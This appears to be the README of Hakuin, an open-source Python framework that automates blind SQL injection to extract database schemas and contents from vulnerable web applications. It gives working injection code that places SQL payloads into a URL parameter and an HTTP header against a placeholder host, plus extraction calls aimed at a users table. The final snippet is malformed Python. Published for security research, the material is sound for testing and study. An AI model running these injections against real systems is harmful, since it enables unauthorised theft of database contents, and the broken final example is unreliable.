hakuin: A blazing fast Blind SQL Injection optimization and automation framework

Hakuin

Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content.

Hakuin has been presented at academic and industrial conferences:

• IEEE Workshop on Offensive Technology (WOOT), 2023
• Hack in the Box, Phuket, 2023

Also, make sure to read our paper or see the slides.

Install

To install Hakuin, simply run:

Developers should install the package locally and set the -e flag for editable mode:

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query is resolved to True or False.

Example 1 – Query Parameter Injection with Status-based Inference

import requests
from hakuin import Requester

class StatusRequester(Requester):
    def request(self, ctx, query):
        r = requests.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
        return r.status_code == 200

Example 2 – Header Injection with Content-based Inference

class ContentRequester(Requester):
    def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        r = requests.get(f'http://vuln.com/', headers=headers)
        return 'found' in r.content.decode()

To start inferring data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 – Inferring SQLite DBs

from hakuin.dbms import SQLite
from hakuin import Extractor, Requester

class StatusRequester(Requester):
    ...

exf = Extractor(requester=StatusRequester(), dbms=SQLite())

Example 2 – Inferring MySQL DBs

from hakuin.dbms import MySQL
...
exf = Extractor(requester=StatusRequester(), dbms=MySQL())

Now that everything is set, you can start inferring DB schemas.

Example 1 – Inferring DB Schemas

# strategy:
#   'binary':   Use binary search
#   'model':    Use pre-trained models
schema = exf.extract_schema(strategy='model')

Example 2 – Inferring DB Schemas with Metadata

# metadata:
#   True:   Detect column settings (data type, nullable, primary key)
#   False:  Pass
schema = exf.extract_schema(strategy='model', metadata=True)

Example 3 – Inferring only Table/Column Names

tables = exf.extract_table_names(strategy='model')
columns = exf.extract_column_names(table='users', strategy='model')

Once you know the schema, you can extract the actual content.

Example 1 – Inferring Textual Columns

# strategy:
#   'binary':       Use binary search
#   'fivegram':     Use five-gram model
#   'unigram':      Use unigram model
#   'dynamic':      Dynamically identify the best strategy. This setting
#                   also enables opportunistic guessing.
res = exfiltrate_text_data(table='users', column='address', strategy='dynamic'):

Copyright (c) 2023 Jakub Pruzinec

Source: https://github.com/pruzko/